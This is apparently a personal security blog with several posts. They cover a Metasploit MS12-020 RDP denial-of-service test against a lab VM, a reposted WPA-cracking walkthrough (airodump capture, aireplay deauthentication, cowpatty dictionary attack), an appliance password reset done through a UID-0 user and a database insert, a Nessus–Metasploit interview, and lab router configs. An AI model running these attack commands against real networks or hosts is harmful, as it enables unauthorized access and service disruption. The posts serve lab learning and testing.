MS12-020 RDP Vulnerability overview and testing


By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”

In short the system would crash and have a “blue screen of death” thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that’s not because the choose to be however most places have a  “patch cycle” which require extensive testing prior to deployment.

As explained by the fine people over at ISC Diary The Microsoft released patch has several reference KB’s which includes ” KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you’ll see on a Windows system, when installed, depends on the version of the OS you’re running. For Windows 7 you’ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always before applying any patch ensure that you read the release notes.
We recently patched our internet facing servers that had RDP enabled and everything went well with the exception of one server that we were unable to log back into via RDP, we had to gain access to the server via the ILO port then applied a few additional patches then rebooted and that seen to solve the issue.Now for the fun part if you would like to test the proof of concept exploit for this vulnerability grab a copy of Metasploit follow the steps below.
 My Test setup:
  • Linux (SolusOS)
  • VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT  3389             yes       The target port

msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf  auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.2.10:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 – 210 bytes sent
[*] 192.168.2.10:3389 – Checking RDP status…
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed

RHOST = The vulnerable host that is running a vulnerable version of RDP

Screenshot of server 2008 reacting to the exploit
Now go on out and patch your systems and if you have some time load Metasploit on a host of your choice and do some testing.

Mitigation:

http://isc.sans.edu/diary.html?storyid=12808
http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids

http://technet.microsoft.com/en-us/library/cc732713.aspx

My Fedora 15 experience

So as most of you might know by now the development team over at Fedora has release a new version of the ever popular Linux distribution; Fedora 15 code name “LoveLock”. This posting is not to get into too much details about the new version or various ways in which you can  install it or anything of the sort for that you can visit Fedora documentation wiki.

The following are major features for Fedora 15:
  • GNOME 3 including the new GNOME 3 shell
  • KDE 4.6 with the improved Plasma workspace, enhanced core applications, and greater memory efficiency.
  • XFCE 4.8 with a new panel, Thunar enhancements and more.
  • Virtualization improvements including Spice support in virt-manager and support for Xen hosts.

Those features listed above are just a few of the great improvements that the new version has to offer, but as with anything new the are some give and take. I took the leaf of faith and installed the new version the day after it was released and I must say it was not what I was expecting at all.

Since I was running Fedora 14 on my Eee PC I figured it was going to be a quick and easy upgrade, so I went over the the wiki and fellowed the below steps:

First install the new fedora 15 gpg key. You may wish to verify this package against https://fedoraproject.org/keys and the fedora ssl certificate.

rpm --import https://fedoraproject.org/static/069C8460.txt

Upgrade all packages with

yum update yum
yum clean all
yum --releasever=15 --disableplugin=presto distro-sync

Problem #1

As simple as the above upgrade looked it didn’t turn out to be so simple for me, the upgrade processes kept failing and when it finally worked and I was prompted to reboot the system would hang at the logo.

If  I hit the ESC key during boot up I would notice that the system was hanging at  “Starting SYSV: Late init script for  live image, Started SYSV: Late init script for live image”.

At this point I know it was time to signup for the mailing list and visit freenode.net #fedora in search of an answer, but since it was a new release everyone else was also asking for help so I had to wait a bit.

I tried a few things but in the ended wiping out my Fedora 14 and installing Fedora 15. At that point I got a potential fix in a reply to my mailing list cry for help, the suggestion was to:

Log into single user mode  and removed all kmod packages, then installed akmod packages through command line.

Once my new install was finish I realized quickly that Gnome 3 was not the way to go on my Eee Netbook, I quickly had the following issues:

  • Screen kept diming eventhough I chaged the power management  and other setting.
  • My wireless connection strength dropped by about 50% even though I was in the same room with the AP, prior to that Fedora 15 I had near perfect signal.
  • The entire windowing experience was too slow, and bulky looking for my Netbook, It was hard to work with two windows side by side.

Hacking the WPA Airwaves

I recently picked up the book Hacking Exposed Wireless 2nd Ed , looks like an awesome book and I cant wait to start testing some of the fun stuff that Joshua , Johnny, and Vincent has lineup. Today while following a discussion in the Pauldotcom IRC room someone pointed me to this guide and I felt it was worth a re-post enjoy.

Hacking the WPA Airwaves

by Mark Bennett, infosecisland.com
May 16th 2011

It is interesting how many people believe that their wireless is secure because they are using WPA.

Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table.

The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs, the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

  • close console window to see collection of packets
  • use alt + k to get to top pull down menu’s, turn on ability to see type of access points bsid and guess at IP address, channel #

Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c –bssid -w wlan0

Example:

airodump-ng -c 9 –bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0  * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng -a -c wlan0

Example:

airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the traffic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has a lot of cell phones like the iPhone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless Ethernet card has a wake-up when the screen is activated.

So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their iPhone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! — LOL!

Happy Cracking…

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Original Page: https://www.infosecisland.com/blogview/13748-Hacking-the-WPA-Airwaves.html

Notes for Linux Basix Episode 39

I  will be joining the guys over at the   Linux Basix podcast tonight and below are some of the things I intend to discuss.

Discussion Links:

  1. 7 Best Network Security Linux Distributions (DoortoDoor): A list of special purpose distros [BackTrack, Network Security Toolkit(NST),Pentoo, nUbuntu(Network Ubuntu),Security Tools Distribution(STD),Helix,Damn Vulnerable Linux]. These distributions are mainly designed to perform network security tasks such as vulnerability assessment and penetration testing in order to prevent and monitor unauthorized entry, abuse, alteration, or denial of computer network resources. Since most of these distros are available as Live CDs, you could instantly try or use them without hard disk installation. Read more over at http://www.junauza.com/2011/01/network-security-linux-distros.html
  2. Soundminer: A Stealthy and Context-AwareSound Trojan for Smartphones: Researchers have developed a low-profile Trojan horse program for Google’s Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software. The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone’s keypad, according to the study.Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said. Read more over at http://www.csoonline.com/article/656264/soundminer-android-malware-listens-then-steals-phone-data

Tech Segment: Password reset the hard way

Problem: I was tasked with retrieving or resetting the web login password to a Linux based custom build system, very similar to an appliance. I currently had limited shell access to the system however I was not certain if the password was stored in /etc/passwd or in some sort of database on the system.

**Before we begin just know that everything mentioned here will probably not work on a normal Ubuntu based system, the manufacture possibly used their know custom Kernel and other system tweaks.**

Commands used:

  1. netstat – a command-line tool that displays network connections, routing tables, and a number of network interface statistics.
  2. fuser – a command line tool to identify processes using files or sockets.
  3. lsof – a command line tool to list open files under Linux / UNIX to report a list of all open files and the processes that opened them.
  4. /proc/$pid/ file system – Under Linux /proc includes a directory for each running process (including kernel processes) at /proc/PID, containing information about that process, notably including the processes name that opened port.
  5. uname- Print name of current system

Phase one “Getting to know the system”:

I started off with a few simple commands to try and identify what various of Linux was the system running:

uname -a (Verify what kernel version I was up against)

yum (To see if it was a Fedora based system)

apt-get (To see if it was an Ubuntu based system and it was)

cat /etc/issue (To check what flavor of Ubuntu, turned out it was “Ubuntu 8.04”)

Next I wanted to get Root access without resetting the Root account password. I figured this would prevent me from having to deal with any restrictions issues.

Created a user called testuser
user@host:~$ sudo adduser testuser

Edit the password file and changed UID and GID to that of root (testuser:x:0:0)
user@host:~$ sudo nano /etc/passwd

Then once  I logged in newly created testuser and I am automatically given root access.
user@host:~$ su – testuser

Since I know that the service I am interest is running on port 443, I will run  few  commands to get a better ideal of whats really going on with this port.

Netstat to view the connection stated and PID for the services running on port 443:

root@host:~# netstat -tulpn | grep 443

tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      5548/pound

To confirm the processes PID use the fuser command:

root@host:~# fuser 443/tcp
443/tcp:              5548  5549

To find out process name and working directory associated with PID # 5548, enter:

root@host:~# ls -l /proc/5548/exe
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/exe -> /opt/pound/sbin/pound

root@host:~# ls -l /proc/5548/cwd
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/cwd -> /opt/app_name/rails/ssl

Now I have an application name and working directory to go investigate. After further research I found out that Pound is a reverse-proxy load balancing server, and the config file showed me it was passing all connection on port 443 to another port on the same server.

I then used lsof to further investigate the newly discovered port:

root@host:# lsof -Pnl +M -i4
mongrel_r 5623      112    3u  IPv4  14528       TCP 127.0.0.1:3000 (LISTEN)

Then to find out the processes own:
root@host:# ps aux | grep 5623

app_user      5623  0.0  1.3  40048 28536 ?        Sl   14:14   0:02 /usr/bin/ruby1.8 /usr/bin/mongrel_rails start -d -e production -p 3000 -a 127.0.0.1 -P log/mongrel.3000.pid –user app_user –group app_name

A bit more research and I found out what mongrel_rails was. Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby web applications of any kind using plain HTTP rather than FastCGI or SCGI.

After poking around a bit more I notice the tie in with a postgres SQL server that I notice in a few earlier commands. Now on to the fun part!

Phase two “Modifying the system”:

Now that I have realized that the system has a database, and the user account is not location in the /etc/passwd file its time to access database identify the user account and make some modifications.

su – postgres to change to the postgres SQL user:
root@host:~# su – postgres

Launching PostgresSQL interactive terminal:
postgres@piab:~$ psql

List all the roles and Superusers :
postgres-# du
List of roles
Role name | Superuser | Create role | Create DB | Connections | Member of
———–+———–+————-+———–+————-+———–
postgres  | yes       | yes         | yes       | no limit    |
App_User  | no        | no          | no        | no limit    |
(2 rows)

List all database on the system:

postgres=# l
List of databases
Name    |  Owner   | Encoding
———–+———-+———-
postgres  | postgres | UTF8
App_Name  | postgres | UTF8

Connect to a database:
postgres=# c App_Name

List of tables:
App_Name=# dt

Schema |        Name        | Type  | Owner
——–+——————–+——-+——-
public | schema_info        | table | App_User
public | users              | table | App_User

Query table users:
select * from users;

Fields of interest to me were (id, login, email, password, salt_val,passwd_create,passwd_updated)

Now before I went any further I ensured to dump the DB using pg_dump and pg_dumpall
postgres@host:~$ pg_dump dbname > /tmp/dbname.out
postgres@host:~$ pg_dumpall > /tmp/db.out

At this point I had a few options:

  • Try to reverse the password encryption and salting mechanism
  • Try to find the code that handles the authentication and bypass that
  • Get access to another box, create a password and copy that hash and encrypted value over to the DB on the other system.

Luckily for me I had access to another device so I  created a password there, and queried that DB and copied over the encrypted password and hash into notepad then used an insert statement to add to the values to the db along with a test user.

Connected back to the DB:
postgres=# c App_Name

Insert new records:
INSERT INTO users (id,login,email,password,salt_val,created_at) values (‘2′,’demo’,’demo@localhost’,’9abdgagf42324243240fdbd’,’8d5d6cd8fa6a0323jb3240988324′,’2006-12-05 21:15:32′);

Went back to the login portal https://ipaddress and bingo! Big shout out to byte_bucket over at irc.freenode.net #pauldotcom, he was very helpful in helping me work through this.

Additional reading:

http://www.cyberciti.biz/faq/what-process-has-open-linux-port/

http://linux.die.net/man/8/pound

http://linux.die.net/man/1/pg_dump

https://support.eapps.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=180

http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/


Nessus and Metasploit living in harmony

I had this post queuing up for a while now but kept holding back waiting on the new version of Metasploit 3.5.0-dev, in addition each time I visited the Metasploit IRC room I would see Zate talking about some cool feature he is working on implementing.

Now on to the reason for this post, being a fan of both Metasploit and Nessus I was very happy when I saw a tweet a month or so back making mention of a project that would bring both of these wonderful tools together in a nice easy to use fashion. That project was labeled ” Nessus Bridge for Metasploit”. The basic goal behind this project was to  allow you to do various tasks with your Nessus server, from within the msf command line.  By that I mean scan with Nessus, review the results, import the results and then exploit the results.” After reading those few lines form the project home page I was already sold.

What can you do with this plug-in or bridge you might ask?

The commands are broken up into the following categories below and are covered in details over at the http://blog.zate.org .

A few prerequisites are needed before you can start hacking away:

  • A host with Metasploit installed and configured (I recommend BackTrack 4)
  • A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
  • A vulnerable host to test with (I recommend you download metasploitable)

Brief  demo section before I get into the interview:

MSF Console

Nessus Login Interface

  1. First fire-up  both Metasploit and Nessus and run an update to ensure you have the latest signatures.
  2. Login into Nessus and create your scanning policy
  3. Close out your browser and prepare to have some fun CLI style!
    1. Load up the nessus module within msfconle with “load nessus”
    2. Next connect to your nessus server with “nessus_connect username:password@host:port ok”
    3. From this point on you can view all polices, perform a scan, import the rules and then use db_autopwn to seal the deal.
      Using nessus_policy_list and nessus_scan_new
    4. Import scan results with “nessus_report_get report id”

      db_autopwn

Now on to the Q & A  section with the Author:

Question: How did you get started on your Infosec journey, and also the blogging  sphere?

Answer: I started out as a Secure data communication guy for the Australian Army and then left to became a Lotus Notes/Web App guy, migrated over to a Solaris/Linux admin and then into Web App Sec and Threat/Vuln Management.  From there I became interested in pen testing, exploits and just generally how the attacker works/thinks.

Blogging is relatively new for me.  I am bad at it, and my blog came about really because I wanted to get some ideas down out of my head where others could see them.  I’ve not really done much in the way of blogging until the Nessus Plugin as I am bad about keeping up with it and finding things to talk about.  Always seemed to be something else
to do.  I think the plugin has given me something to start with and now I am queuing up posts for weeks ahead.

Q: What was your motivation behind this project?

A: Part of it was being envious of the cool integration that Nexpose has with Metasploit and most of it was being frustrated at having to move between interfaces to try and find things to exploit.  When I first started with Metasploit it was annoying to have these cool exploits to use but I struggled to find exploitable hosts.

I then did the offensivesecurity.com PwB v3 course and gained some knowledge on how to find things to exploit and then I did some playing around with importing nessus scans.  It was clunky and around the same time I was experimenting with putting a Drupal front end on Nessus. Part of that process was the discovery of a cool nessus-xmlrpc ruby library by k0st.

Everything kind of clicked together and I thought what if i could stick that library in Metasploit and talk directly to the my Nessus server and import the data right into Metasploit.  Some awkward talks about licenses later and HDM merged k0st’s library and my basic shell of a plugin.  (Big thanks to k0st for his hard work on the library which i used as a starting point)

Q: What advice would you give  a newcomer that would like start using this  bridge?

A: Test it out and send me (or Metasploit) bug reports/enhancement requests… hehe.  Full guide on using the plugin is up at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/ . Don’t be shy, join #nessus or #metasploit on freenode and ask questions (I am in there as MrUrbanity or Zate).  Start with working with all the tools on one box (nessus, msf, database) and I find Ubuntu (native or vmware player) the best way to start.  Scan things (that you have permission to scan, or own) and play with it, see how it works.

Q: What tips would you give someone for maximizing the usefulness of this  bridge?

A: This plugin wont magically make your Nessus scans more accurate, you still have to tweak/tune them and honestly right now that is probably best done through the web interface for policy tuning.  Don’t expect to scan a class C and have it import easily, big reports are a pain right now (streaming parser coming soon).  Ideally the way to use this is scan, examine, import, pwn.  It’s not a replacement for knowing about exploits and vulnerabilities, you will still need to do some work :).

Q: Why did you choose Metasploit above other application/frameworks to incorporate this  functionality?

A: I don’t think there is another offensive exploitation tool out there with the same power and flexibility to allow it’s end users to join in the fun and submit modifications.  It’s one thing to do a RFE (Request for Enhancement) and another entirely to code that enhancement and submit it to be included in the tool.  I think the combination of free msf and a free (or cheap) nessus scanner is pretty powerful for a security guy trying hard to keep his network running securely.  Also ruby is just a joy to code in.

Q: On a personal note, how did you get your handle?

A: I tend to go by MrUrbanity a lot and Urbanity means polite/refined/quiet which depending on who you ask is either me, or not me.  I’m a pretty calm guy, takes quite a bit to offend or upset me so the name kind of fit.

Q: If someone wants to assist you with this project what’s the best approach?Couple of ways.  Email me (zate75 [at] gmail.com) or find me on IRC (freenode in #metasploit and #nessus) or head to http://github.com/Zate/Nessus-Bridge-for-Metasploitfork it, hack it and submit a pull request for me to include your changes.  I then submit a diff to msfdev about once a week (or when I have significant changes).

A: You can also help me out a great deal by grabbing the code off github and running it and then reporting any bugs or features back to github. Why github and not the metasploit site?  Mainly to not annoy the msfdevs.  This way I can tweak/hack/commit as often as I need to and not impact their work on msf.  I can then just submit working code
when I need it included in msf.

A big thank you to Zate a.k.a MrUrbanity for letting me interview and most importantly for making such a contribution to the community.

Notes for Linux Basix Eps22

Today’s post will serve as a sort of show notes for the Linux Basix podcast that I will be a guest on tonight.

Discussion Links:

  1. SET v0.7 aka “Swagger Wagon” new release, I did a blog posting on the 14th highlighting SET, and I am mentioning it here again because I think it worth taking a look at this program. For anyone not familiar with the Social-Engineer Toolkit (SET), it’s specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. The group also had a Social Engineering Capture the Flag competition at”Defcon 18″ and the have finally release the full report http://www.social-engineer.org/resources/sectf/Social-Engineer_CTF_Report.pdf
  2. A report was published detailing the exploits of a former Google engineer who allegedly used his internal clearances to access private Gmail and GTalk accounts so that he could spy on and harass people, including four minors, read more over at http://techcrunch.com/2010/09/14/google-engineer-spying-fired/. Now this brings me back to a similar point I made a while back, we have to stop putting all our truth in the cloud-base services because we never know if or how much the are violating our privacy.
  3. Second time’s a charm “Linux Kernel 0-day bug”, on the 16th I did a quick new bulletin post highlighting a serious Linux vulnerability. The vulnerability was found in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of  kernel version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access, Read the complete article over at The Register..
  4. Is Stuxnet the ‘best’ malware ever? Even though this is not Linux related issue, I know a lot of us fix our friends and family computers and its always good to keep-up on new malware threads. The Stuxnet worm is a “groundbreaking” piece of malware so devious in its use of unpatched vulnerabilities, so sophisticated in its multipronged approach, that the security researchers who tore it apart believe it may be the work of state-backed professionals. They work for the two security companies that discovered that Stuxnet exploited not just one zero-day Windows bug but four — an unprecedented number for a single piece of malware, read full article over at computerworld.com.
  5. Tunneling SSH over HTTP(S), Not much to talk about this one but I think it’s pretty cool and you should give it a try, I know I will. –> http://dag.wieers.com/howto/ssh-http-tunneling/

Tech Segment: Building your test lab


During this segment I i will be discussing what I have been up too for the last  few days and thats rebuilding my home network so I can  have more that just a laptop to perform my various testing.

Equipment used in lab:

  • HP DL 380 G4 server with 6 drives (2X75, 4X150) with ESXi installed.
  • Cisco 3500 switch
  • Cisco 2621 router
  • Verizon FIOS Wifi router.
  • PFsense FW

OS currently installed:

  • FreeBSD
  • Ubuntu server
  • Snorby IDS

Router config:

RT01#sh run
Building configuration…

Current configuration : 1202 bytes
!
version 12.1
no service single-slot-reload-enable
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname RT01
!
enable secret 5 10g1n///
enable password 7 10g1n///
!
ip subnet-zero
!
interface FastEthernet0/0
no ip address
speed 100
full-duplex
!
interface FastEthernet0/0.30
encapsulation dot1Q 30
ip address 10.29.19.1 255.255.255.0
!
interface FastEthernet0/0.40
encapsulation dot1Q 40
ip address 10.29.20.1 255.255.255.0
!
interface FastEthernet0/0.50
encapsulation dot1Q 50
ip address 10.29.21.1 255.255.255.0
!
interface Serial0/0
no ip address
shutdown
!
interface FastEthernet0/1
description Transit-to-FW
ip address 172.1.1.2 255.255.255.252
duplex auto
speed auto
!
interface FastEthernet0/1.10
encapsulation dot1Q 10
!
router rip
version 2
network 172.0.0.0
network 10.29.0.0
no auto-summary
!
ip classless
ip route 0.0.0.0 0.0.0.0 172.1.1.1
no ip http server
!
line con 0
password 7 10g1n///
login
line aux 0
line vty 0 2
password 7 10g1n///
login
line vty 3 4
password 7 10g1n///
login
!
end

Switch Config:

SW01#sh run
Building configuration…

Current configuration:
!
! No configuration change since last restart
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log datetime msec
service password-encryption
!
hostname SW01
!
enable password 7 10g1n///
!
username infolookup password 7 10g1n///
!
ip subnet-zero
no ip domain-lookup
!
interface FastEthernet0/1
description Uplink-to-Verizon
switchport access vlan 10
spanning-tree portfast
!
interface FastEthernet0/2
description Firewall-OUT-interface
switchport access vlan 10
spanning-tree portfast
!
interface FastEthernet0/3
description Firewall Inside-Transit
switchport access vlan 11
!
interface FastEthernet0/4
description Link to Router  – Fa0/1
duplex full
switchport access vlan 11
!
interface FastEthernet0/5
!
interface FastEthernet0/18
!
interface FastEthernet0/19
switchport access vlan 30
spanning-tree portfast
!
interface FastEthernet0/20
description Inside-workstation
switchport access vlan 40
spanning-tree portfast
!
interface FastEthernet0/33
description ESX Host
duplex full
speed 100
switchport trunk encapsulation dot1q
switchport trunk native vlan 30
switchport trunk allowed vlan 1,30,40,50,1002-1005
switchport mode trunk
!
interface FastEthernet0/34
!
interface FastEthernet0/35
description ESXi Host-Mgmnt
duplex full
speed 100
switchport access vlan 40
spanning-tree portfast
!
interface FastEthernet0/36
!
interface FastEthernet0/48
duplex full
speed 100
switchport trunk encapsulation dot1q
switchport trunk native vlan 30
switchport trunk allowed vlan 1,30,40,50,1002-1005
switchport mode trunk
!
interface GigabitEthernet0/1
!
interface GigabitEthernet0/2
!
interface VLAN1
no ip address
no ip directed-broadcast
no ip route-cache
shutdown
!
interface VLAN30
ip address 10.29.19.10 255.255.255.0
no ip directed-broadcast
no ip route-cache
!
interface VLAN100
no ip directed-broadcast
no ip route-cache
shutdown
!
ip default-gateway 10.29.19.1
!
line con 0
exec-timeout 0 0
password 7 10g1n///
login local
transport input none
stopbits 1
line vty 0 4
password 7 10g1n///
login local
line vty 5 15
no login
!
ntp clock-period 11259018
ntp server 153.16.4.130
end

PFsense Config:

  • Configured port forwarding, you can do this via the interface or be editing /config/config.xml
    • Forward to my FreeBSD box
    • Configured my dynamic DNS  host (free of course)
    • Forward my VMware ESX connection over SSH
    • Configured Snort to send logs to Snorby

Links:

Second time’s a charm “Linux Kernel 0-day bug”

I am sure by noon today you will see lots more technology blogs talking about this old but yet new bug. “The Linux kernel has been purged of a bug that gave root access to untrusted users – again.”

Background:

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.

//

The bug was originally discovered by the late hacker Wojciech “cliph” Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. Read the complete article over at The Register..

Sample exploit is already in the wild as show via http://seclists.org/fulldisclosure/2010/Sep/268 . Since I am not a expert in exploit development or analysis I will sit back and wait for the guys over at Metasploit or SET to whip up so I can test.